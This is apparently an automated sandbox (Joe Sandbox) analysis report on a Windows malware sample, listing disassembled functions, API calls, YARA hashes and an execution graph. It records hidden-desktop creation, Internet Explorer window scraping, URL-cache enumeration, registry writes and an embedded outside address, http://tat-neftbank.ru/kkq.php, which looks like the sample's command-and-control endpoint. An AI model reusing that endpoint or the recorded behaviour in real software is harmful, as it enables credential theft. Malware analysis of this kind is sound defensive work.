                            Yara matches
                            Similarity
                            • API ID: printf
                            • String ID: %02X $HEX:
                            • API String ID: 3524737521-2568639716
                            • Opcode ID: 20ec43f9d3281b237926bfbb5e092365326a766f922892e0b88cafedccc6c182
                            • Instruction ID: 8eff4c8c66366255d0771bcdb7d8d21a427f9234d78b176c67630138abebef86
                            • Opcode Fuzzy Hash: 20ec43f9d3281b237926bfbb5e092365326a766f922892e0b88cafedccc6c182
                            • Instruction Fuzzy Hash: 43F0E972F05214BBD704DB9ADC4286E77A9DB9236473080FBF804631C0E9755F0086A9
                            Function 00403BBE Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 112COMMON
                            Download Yara Rule
                            APIs
                            • memset.CRTDLL(?,00000090,00000008,56CC39D8,-0042AA50,297D09F2,00000000), ref: 00403C8B
                            • memcpy.CRTDLL(?,-0042AA50,00000000,?,00000090,00000008,56CC39D8,-0042AA50,297D09F2,00000000), ref: 00403CAE
                            • memcpy.CRTDLL(-0042AA50,?,00000006,?,-0042AA50,00000000,?,00000090,00000008,56CC39D8,-0042AA50,297D09F2,00000000), ref: 00403CBE
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981311226.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.1981277503.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981406801.000000000042E000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981476066.000000000042F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981508164.0000000000436000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981572847.0000000000438000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Nejhbi32.jbxd
                            Yara matches
                            Similarity
                            • API ID: memcpy$memset
                            • String ID: MC
                            • API String ID: 438689982-3957011357
                            • Opcode ID: 17c6be56fc60e202b714f164ab6214ad707b693cbc1fda5e6d8626b4e57840bc
                            • Instruction ID: 0fabd55d67194886af3b95eda558b9f651b3b184c5d0290ca09bafd6d30b71fa
                            • Opcode Fuzzy Hash: 17c6be56fc60e202b714f164ab6214ad707b693cbc1fda5e6d8626b4e57840bc
                            • Instruction Fuzzy Hash: F131B661F08198AFDB00DFBDC84169EBFFA9B4A210F1480B6E884F7381D5789F059765
                            Function 004017AC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68comCOMMON
                            Download Yara Rule
                            APIs
                            • CoInitialize.OLE32(00000000), ref: 004017CC
                            • CLSIDFromString.OLE32({9BA05972-F6A8-11CF-A442-00A0C90A8F39},?), ref: 004017DA
                            • CoCreateInstance.OLE32(?,00000000,?,0042CD50,?,{9BA05972-F6A8-11CF-A442-00A0C90A8F39},?), ref: 00401803
                            Strings
                            • {9BA05972-F6A8-11CF-A442-00A0C90A8F39}, xrefs: 004017D5
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981311226.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.1981277503.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981406801.000000000042E000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981476066.000000000042F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981508164.0000000000436000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981572847.0000000000438000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Nejhbi32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateFromInitializeInstanceString
                            • String ID: {9BA05972-F6A8-11CF-A442-00A0C90A8F39}
                            • API String ID: 1245325315-1222218007
                            • Opcode ID: 374fb238f9a8af98a0c272c884aa5e7a000c0b0753857630dac3c0af84d03f4f
                            • Instruction ID: 52c0c8d8f8a1b88d6522b4dea913535513547713cd70a2aa0dd21656c7656eb5
                            • Opcode Fuzzy Hash: 374fb238f9a8af98a0c272c884aa5e7a000c0b0753857630dac3c0af84d03f4f
                            • Instruction Fuzzy Hash: E1118673B102116FE710FEF5DC81BAB7AE89B00355F10483BE644F32D1E6B8A50286B9
                            Function 0040109B Relevance: 6.1, APIs: 4, Instructions: 122COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981311226.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.1981277503.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981406801.000000000042E000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981476066.000000000042F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981508164.0000000000436000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981572847.0000000000438000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Nejhbi32.jbxd
                            Yara matches
                            Similarity
                            • API ID: signal$raise
                            • String ID:
                            • API String ID: 372037113-0
                            • Opcode ID: 2d1ef5de37ea69ebb4b8d4bb24db1da757c13c860f6842aad27d4f5ac914ae12
                            • Instruction ID: baa5ba32779064c34a5af0890878b5a2dbb5619b613b0807c362cc876063d63b
                            • Opcode Fuzzy Hash: 2d1ef5de37ea69ebb4b8d4bb24db1da757c13c860f6842aad27d4f5ac914ae12
                            • Instruction Fuzzy Hash: 4541B475A01204DFC720DF18EC84B5677B4FB08350F44457AEE14AB3E1E734A965CBAA
                            Function 0040447A Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68memorystringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlenA.KERNEL32(?), ref: 00404492
                            • LocalAlloc.KERNEL32(00000040,-00000008,?), ref: 004044A4
                            • sprintf.CRTDLL(?,%s%c%c,?,4EC4EBEE,?,00000040,-00000008,?), ref: 00404515
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981311226.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.1981277503.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981406801.000000000042E000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981476066.000000000042F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981508164.0000000000436000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981572847.0000000000438000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Nejhbi32.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocLocallstrlensprintf
                            • String ID: %s%c%c
                            • API String ID: 2176257816-3118753097
                            • Opcode ID: 3bea807363c46ff2eeabd7410228c447bcb65eafde6f1461acbb5ea9ba8cf64b
                            • Instruction ID: 40b1eb1d73d9c04af9a72cf5af1a140bd4a75b2e1492408562adfdfa8721cd8f
                            • Opcode Fuzzy Hash: 3bea807363c46ff2eeabd7410228c447bcb65eafde6f1461acbb5ea9ba8cf64b
                            • Instruction Fuzzy Hash: F9110B72E0406867DB009A9A88815AFFBB69FC5310F1641F7EA04B73C1D27CAD0193A5
                            Function 0040421F Relevance: 6.0, APIs: 4, Instructions: 49registryCOMMON
                            Download Yara Rule
                            APIs
                            • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,00020006,00000000,?,?,4FB14922), ref: 00404255
                            • RegSetValueExA.ADVAPI32(?,4FB14922,00000000,00000000,?,?,?,?,00000000,00000000,00000000,00020006,00000000,?,?,4FB14922), ref: 00404273
                            • RegCloseKey.ADVAPI32(?,?,4FB14922,00000000,00000000,?,?,?,?,00000000,00000000,00000000,00020006,00000000,?,?), ref: 0040427F
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981311226.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.1981277503.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981406801.000000000042E000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981476066.000000000042F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981508164.0000000000436000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981572847.0000000000438000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Nejhbi32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseCreateValue
                            • String ID:
                            • API String ID: 1818849710-0
                            • Opcode ID: 65498cc65565106dc5b66ff6a4b4d842dc0e77ec129b82882a45272a282f6444
                            • Instruction ID: d96ef7c4080a9b633a5bca21bfcbc2c766a155132064e5ed691f16c3214ccdec
                            • Opcode Fuzzy Hash: 65498cc65565106dc5b66ff6a4b4d842dc0e77ec129b82882a45272a282f6444
                            • Instruction Fuzzy Hash: B801F772B10109BBCF11AEB5CC02F9EBEBA9F84340F240476B704F61E0D675D9116718
                            Function 0040429C Relevance: 6.0, APIs: 4, Instructions: 47registryCOMMON
                            Download Yara Rule
                            APIs
                            • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004042D3
                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00020019,?), ref: 004042EF
                            • RegCloseKey.ADVAPI32(?,?,?,00000000,00000000,?,?,?,?,00000000,00020019,?), ref: 004042FB
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981311226.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.1981277503.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981406801.000000000042E000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981476066.000000000042F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981508164.0000000000436000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981572847.0000000000438000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Nejhbi32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseOpenQueryValue
                            • String ID:
                            • API String ID: 3677997916-0
                            • Opcode ID: 357a631b938b58c4fbb87905ba1aa3de6a3adf1b78dd9d8722630d207e2470c7
                            • Instruction ID: 691f158720e2b36127ee9bd81ba90e70b5a5535aabeb9bf87ba7554e5ddc9d88
                            • Opcode Fuzzy Hash: 357a631b938b58c4fbb87905ba1aa3de6a3adf1b78dd9d8722630d207e2470c7
                            • Instruction Fuzzy Hash: 9801F271B1410ABACF109E25CC02BEEBFA99F94390F140472BE04F61E1D374EE11A3A9
                            Function 00403743 Relevance: 6.0, APIs: 4, Instructions: 43fileCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403769
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403780
                            • WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403798
                            • CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080), ref: 0040379E
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981311226.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.1981277503.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981406801.000000000042E000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981476066.000000000042F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981508164.0000000000436000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981572847.0000000000438000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Nejhbi32.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateHandlePointerWrite
                            • String ID:
                            • API String ID: 3604237281-0
                            • Opcode ID: dac2396c127bae0588a020e64ec8d65c8c20fafefb6c849fc3be04b1fb147846
                            • Instruction ID: cf1cf3c615f6ac6775c7614bbea78a1f327309af87cada33f382846b8ae172d8
                            • Opcode Fuzzy Hash: dac2396c127bae0588a020e64ec8d65c8c20fafefb6c849fc3be04b1fb147846
                            • Instruction Fuzzy Hash: 1BF0E972B442143AE62029758C03FDE355D8B41B78F144131FB10FB1D1D5B8BA0142AD
                            Function 0040185F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 152COMMON
                            Download Yara Rule
                            APIs
                            • GetWindowTextA.USER32(?,?,?), ref: 004018E2
                            • _sleep.CRTDLL(00000000), ref: 00401985
                            Strings
                            • Microsoft Internet Explorer, xrefs: 004018E9
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981311226.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.1981277503.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981406801.000000000042E000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981476066.000000000042F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981508164.0000000000436000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981572847.0000000000438000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Nejhbi32.jbxd
                            Yara matches
                            Similarity
                            • API ID: TextWindow_sleep
                            • String ID: Microsoft Internet Explorer
                            • API String ID: 2600969163-3125735337
                            • Opcode ID: 2f2919c86dfda4ef7c58b175597176eedc8b81590a8529b1749621bc65d83200
                            • Instruction ID: b939d44f97a8665b9279395720dceab0b5e56fea97a4cdd5017e5321b1dcff8d
                            • Opcode Fuzzy Hash: 2f2919c86dfda4ef7c58b175597176eedc8b81590a8529b1749621bc65d83200
                            • Instruction Fuzzy Hash: 0B511D71A00215EFDB20CFA8D884BAAB7F4BB18315F5041B6E904E72A0D7749995CF59
                            Function 0040682B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00406753: CreateFileA.KERNEL32(?,80000000,?,00000000,?,00000080,00000000), ref: 0040677F
                              • Part of subcall function 00406753: GetFileSize.KERNEL32(00000000,00000000,?,80000000,?,00000000,?,00000080,00000000), ref: 0040679E
                              • Part of subcall function 00406753: CloseHandle.KERNEL32(00000000,00000000,00000000,?,80000000,?,00000000,?,00000080,00000000), ref: 004067A6
                            • _sleep.CRTDLL(000927C0,00418E30,http://tat-neftbank.ru/kkq.php,ofs_kk), ref: 00406854
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981311226.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.1981277503.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981406801.000000000042E000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981476066.000000000042F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981508164.0000000000436000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981572847.0000000000438000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Nejhbi32.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateHandleSize_sleep
                            • String ID: http://tat-neftbank.ru/kkq.php$ofs_kk
                            • API String ID: 4235044784-1201080362
                            • Opcode ID: 616e9dee88e1a58cfa8eb2cd68ddd21616f6de5f00dd5623ea3079b7e2cd762d
                            • Instruction ID: fffe33e14b07b0123592d698d33e8a34a507cc30d1f0c5c96ad3af2b43ec03e4
                            • Opcode Fuzzy Hash: 616e9dee88e1a58cfa8eb2cd68ddd21616f6de5f00dd5623ea3079b7e2cd762d
                            • Instruction Fuzzy Hash: ADD05E72B453043B9200757E9D07929F5CE4AA0AA83B9446BBA01F73F1E8F89E1151AB

                            Execution Graph

                            Execution Coverage:5.4%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:0%
                            Total number of Nodes:542
                            Total number of Limit Nodes:2
                            execution_graph 2708 403840 printf 2709 403880 2708->2709 2710 403884 printf 2709->2710 2711 40386d printf 2709->2711 2711->2709 2717 4052e0 2718 4052ec strcat strcat 2717->2718 2734 40431f 2718->2734 2721 405360 2722 40537c CreateProcessA 2721->2722 2723 405469 2722->2723 2724 4053ac CloseHandle sprintf 2722->2724 2725 405492 DeleteFileA LocalFree TerminateProcess CloseHandle 2723->2725 2726 405413 2724->2726 2727 4054d0 2725->2727 2728 4053e5 FindWindowA 2726->2728 2729 40541d 2726->2729 2728->2729 2730 405402 Sleep 2728->2730 2729->2723 2731 405421 Sleep 2729->2731 2730->2726 2732 405434 Sleep 2731->2732 2733 40543e GetWindowTextA 2731->2733 2732->2733 2733->2723 2735 404341 GetCurrentThreadId GetThreadDesktop 2734->2735 2736 404364 CreateDesktopA 2734->2736 2737 40438e SetThreadDesktop 2735->2737 2738 40435f memset 2735->2738 2736->2737 2736->2738 2737->2738 2738->2721 2738->2722 2841 401581 2842 4015c8 2841->2842 2843 4015a2 rand 2842->2843 2844 4015cc 2842->2844 2843->2842 2739 403562 GetModuleFileNameA 2740 403588 2739->2740 3001 402ba3 3004 402a89 3001->3004 3002 402cd2 3003 402cad GetCurrentProcessId 3003->3004 3004->3002 3004->3003 3005 402b2a GetModuleHandleA GetProcAddress 3004->3005 3005->3004 2741 4077e4 2742 407808 2741->2742 2749 40789e 2741->2749 2743 407820 SetFocus 2742->2743 2744 40782b 2742->2744 2742->2749 2743->2744 2745 407833 SetFocus 2744->2745 2746 40783e 2744->2746 2745->2746 2747 407857 2746->2747 2748 40784c SetFocus 2746->2748 2750 40786a 2747->2750 2751 40785f SetFocus 2747->2751 2748->2747 2754 407910 2749->2754 2755 4078fe CallWindowProcA 2749->2755 2752 407872 SetFocus 2750->2752 2753 40787d 2750->2753 2751->2750 2752->2753 2753->2749 2756 407885 SetFocus 2753->2756 2755->2754 2756->2749 2845 405c09 lstrlenA GetTickCount srand 2878 40509b 2845->2878 2850 405f54 2851 405caf ExpandEnvironmentStringsA 2892 40570c 2851->2892 2854 405ceb strcat strcat 2855 40431f 4 API calls 2854->2855 2856 405d14 memset 2855->2856 2857 405d72 CreateProcessA 2856->2857 2858 405d56 2856->2858 2859 405da2 CloseHandle sprintf 2857->2859 2860 405f24 DeleteFileA TerminateProcess CloseHandle 2857->2860 2858->2857 2861 405e09 2859->2861 2860->2850 2862 405e13 2861->2862 2863 405ddb FindWindowA 2861->2863 2862->2860 2865 405e1b Sleep GetWindowTextA 2862->2865 2863->2862 2864 405df8 Sleep 2863->2864 2864->2861 2866 405e50 2865->2866 2866->2860 2931 405613 2866->2931 2868 405e6b 2868->2860 2869 405e76 CopyFileA 2868->2869 2870 403619 5 API calls 2869->2870 2871 405e9c DeleteFileA lstrlenA strncmp 2870->2871 2872 405ec6 lstrlenA 2871->2872 2873 405eef 2871->2873 2939 403743 CreateFileA 2872->2939 2875 403743 4 API calls 2873->2875 2876 405eea LocalFree 2875->2876 2876->2860 2879 4050ea 2878->2879 2880 4050b6 sprintf 2879->2880 2881 4050f8 2879->2881 2942 4041f4 2880->2942 2882 4041f4 4 API calls 2881->2882 2884 40510e 2882->2884 2945 4041c3 lstrlenA 2884->2945 2887 40429c RegOpenKeyExA 2888 4042e0 RegQueryValueExA 2887->2888 2889 4042dc 2887->2889 2890 404304 RegCloseKey 2888->2890 2891 4042f8 RegCloseKey 2888->2891 2889->2850 2889->2851 2890->2889 2891->2889 2893 4079e4 2892->2893 2894 405719 GetTempPathA 2893->2894 2895 405746 2894->2895 2895->2895 2953 4015ea 2895->2953 2898 405798 strcat 2899 4057ac rand 2898->2899 2900 4057e7 rand 2899->2900 2901 4057be rand sprintf 2899->2901 2902 4057f9 strcat 2900->2902 2903 40580d strcat rand 2900->2903 2901->2900 2902->2903 2904 405839 strcat 2903->2904 2905 40584d rand 2903->2905 2904->2905 2906 405888 sprintf rand 2905->2906 2907 40585f rand sprintf 2905->2907 2908 4058c3 strcat 2906->2908 2909 4058d7 strcat rand 2906->2909 2907->2906 2908->2909 2910 405911 strcat rand 2909->2910 2911 4058fd strcat 2909->2911 2912 405966 strcat rand 2910->2912 2913 40593d rand sprintf 2910->2913 2911->2910 2914 4059a0 strcat rand 2912->2914 2915 40598c strcat 2912->2915 2913->2912 2916 4059d2 strcat 2914->2916 2917 4059e6 strcat rand 2914->2917 2915->2914 2916->2917 2918 405a20 sprintf rand 2917->2918 2919 405a0c strcat 2917->2919 2920 405a70 strcat rand 2918->2920 2921 405a5c strcat 2918->2921 2919->2918 2922 405ab0 rand sprintf rand 2920->2922 2923 405a9c strcat 2920->2923 2921->2920 2924 405af3 strcat 2922->2924 2925 405b07 strcat rand 2922->2925 2923->2922 2924->2925 2926 405b39 strcat 2925->2926 2927 405b4d rand 2925->2927 2926->2927 2928 405b88 strcat CreateFileA lstrlenA WriteFile CloseHandle 2927->2928 2929 405b5f rand sprintf 2927->2929 2930 405c04 2928->2930 2929->2928 2930->2850 2930->2854 2932 4079e4 2931->2932 2933 405620 FindFirstUrlCacheEntryA 2932->2933 2934 405663 _stricmp 2933->2934 2937 405685 2933->2937 2935 4056a7 FindNextUrlCacheEntryA 2934->2935 2934->2937 2936 4056c9 _stricmp 2935->2936 2935->2937 2936->2937 2938 4056fb 2936->2938 2937->2868 2938->2935 2940 403775 2939->2940 2941 403779 SetFilePointer WriteFile CloseHandle 2939->2941 2940->2876 2941->2940 2948 40421f RegCreateKeyExA 2942->2948 2946 40421f 4 API calls 2945->2946 2947 4041ee InterlockedIncrement memset 2946->2947 2947->2887 2949 404262 RegSetValueExA 2948->2949 2950 404219 2948->2950 2951 404288 RegCloseKey 2949->2951 2952 40427c RegCloseKey 2949->2952 2950->2879 2951->2950 2952->2950 2954 401634 2953->2954 2955 401638 strcat sprintf rand 2954->2955 2956 40160e rand 2954->2956 2955->2898 2955->2899 2956->2954 3006 4037aa 3007 4037c8 printf printf 3006->3007 3009 40380d 3007->3009 3010 4037fa printf 3009->3010 3012 403812 printf 3009->3012 3010->3009 3013 4035ab 3014 4079e4 3013->3014 3015 4035b8 vsprintf 3014->3015 3018 4035f9 MessageBoxA 3015->3018 3017 4035ea 3018->3017 2757 40686c lstrlenA 2758 405f5b 9 API calls 2757->2758 2759 40689a 2758->2759 2760 4068a1 WinExec 2759->2760 2761 4068a9 2759->2761 2760->2761 2957 40328f 2958 402efd 2957->2958 2959 402cd7 3 API calls 2958->2959 2960 4033ce 2958->2960 2961 40289a 4 API calls 2958->2961 2962 4030e5 GetModuleHandleA 2958->2962 2963 40314c VirtualQuery 2958->2963 2965 402f98 GlobalMemoryStatus 2958->2965 2966 402f6f IsBadReadPtr 2958->2966 2967 403059 CloseHandle 2958->2967 2959->2958 2961->2958 2962->2958 2963->2958 2964 4031b1 IsBadWritePtr 2963->2964 2964->2958 2965->2958 2966->2958 2967->2958 2968 407892 2969 40789e 2968->2969 2970 407910 2969->2970 2971 4078fe CallWindowProcA 2969->2971 2971->2970 3019 405133 10 API calls 3020 40429c 4 API calls 3019->3020 3021 405264 3020->3021 3022 405278 3021->3022 3023 40526b LocalFree 3021->3023 3025 40509b 6 API calls 3022->3025 3024 4054d0 3023->3024 3026 40527d ExpandEnvironmentStringsA 3025->3026 3045 404532 3026->3045 3029 4052d3 LocalFree 3029->3024 3030 4052ec strcat strcat 3031 40431f 4 API calls 3030->3031 3032 405315 memset 3031->3032 3033 405360 3032->3033 3034 40537c CreateProcessA 3032->3034 3033->3034 3035 4053ac CloseHandle sprintf 3034->3035 3044 405469 3034->3044 3037 405413 3035->3037 3036 405492 DeleteFileA LocalFree TerminateProcess CloseHandle 3036->3024 3038 4053e5 FindWindowA 3037->3038 3039 40541d 3037->3039 3038->3039 3040 405402 Sleep 3038->3040 3041 405421 Sleep 3039->3041 3039->3044 3040->3037 3042 405434 Sleep 3041->3042 3043 40543e GetWindowTextA 3041->3043 3042->3043 3043->3044 3044->3036 3046 40453f 3045->3046 3047 403619 5 API calls 3046->3047 3048 404570 3047->3048 3049 404579 3048->3049 3050 404596 lstrlenA LocalAlloc GetTempPathA 3048->3050 3051 404589 LocalFree 3048->3051 3049->3029 3049->3030 3052 404604 3050->3052 3051->3049 3052->3052 3053 4015ea rand 3052->3053 3054 40461d strcat sprintf rand 3053->3054 3055 404655 strcat 3054->3055 3056 404668 rand 3054->3056 3055->3056 3057 40467a rand sprintf 3056->3057 3058 40469d rand 3056->3058 3057->3058 3059 4046bb strcat 3058->3059 3060 4046ce strcat rand 3058->3060 3059->3060 3061 4046f3 strcat 3060->3061 3062 404706 rand 3060->3062 3061->3062 3063 404741 sprintf rand 3062->3063 3064 40471e rand sprintf 3062->3064 3065 404770 strcat 3063->3065 3066 404783 strcat rand 3063->3066 3064->3063 3065->3066 3067 4047a8 strcat 3066->3067 3068 4047bb strcat rand 3066->3068 3067->3068 3069 4047e6 rand sprintf 3068->3069 3070 404809 rand sprintf sprintf rand 3068->3070 3069->3070 3071 404859 rand sprintf 3070->3071 3072 40487c rand 3070->3072 3071->3072 3073 404894 strcat 3072->3073 3074 4048a7 rand 3072->3074 3073->3074 3075 4048b9 strcat 3074->3075 3076 4048cc rand 3074->3076 3075->3076 3077 4048f1 sprintf rand 3076->3077 3078 4048de strcat 3076->3078 3079 404926 strcat 3077->3079 3080 404939 rand 3077->3080 3078->3077 3079->3080 3081 40494b strcat 3080->3081 3082 40495e rand 3080->3082 3081->3082 3083 404976 rand sprintf 3082->3083 3084 404999 3082->3084 3083->3084 3087 4049a3 3084->3087 3111 404b12 3084->3111 3085 4043bf 2 API calls 3085->3111 3086 404b07 3088 404c87 strcat rand 3086->3088 3087->3086 3091 404a4b sprintf rand 3087->3091 3092 4049d9 sprintf 3087->3092 3089 404cac strcat 3088->3089 3090 404cbf rand 3088->3090 3089->3090 3093 404cd1 strcat 3090->3093 3094 404ce4 rand 3090->3094 3095 404a82 strcat 3091->3095 3096 404a95 rand 3091->3096 3092->3087 3093->3094 3098 404cf6 strcat 3094->3098 3099 404d09 strcat rand 3094->3099 3095->3096 3100 404aa7 strcat 3096->3100 3101 404aba rand 3096->3101 3097 404b47 sprintf 3097->3111 3098->3099 3102 404d34 rand sprintf 3099->3102 3103 404d57 rand 3099->3103 3100->3101 3101->3087 3104 404acc strcat 3101->3104 3102->3103 3105 404d69 strcat 3103->3105 3106 404d7c rand 3103->3106 3104->3087 3105->3106 3107 404da1 rand 3106->3107 3108 404d8e strcat 3106->3108 3109 404db9 strcat 3107->3109 3110 404dcc rand 3107->3110 3108->3107 3109->3110 3112 404e01 strcat rand 3110->3112 3113 404dde rand sprintf 3110->3113 3111->3085 3111->3088 3111->3097 3138 40447a lstrlenA LocalAlloc 3111->3138 3115 404e2c strcat 3112->3115 3116 404e3f strcat rand 3112->3116 3113->3112 3115->3116 3118 404e64 strcat 3116->3118 3119 404e77 strcat rand 3116->3119 3118->3119 3122 404ea2 strcat 3119->3122 3123 404eb5 sprintf rand 3119->3123 3120 404c02 rand 3124 404c14 strcat 3120->3124 3125 404c27 rand 3120->3125 3121 404bef strcat 3121->3120 3122->3123 3126 404ee3 strcat 3123->3126 3127 404ef6 strcat rand 3123->3127 3124->3125 3128 404c39 strcat 3125->3128 3129 404c4c LocalFree 3125->3129 3126->3127 3130 404f27 strcat 3127->3130 3131 404f3a rand sprintf rand 3127->3131 3128->3129 3129->3111 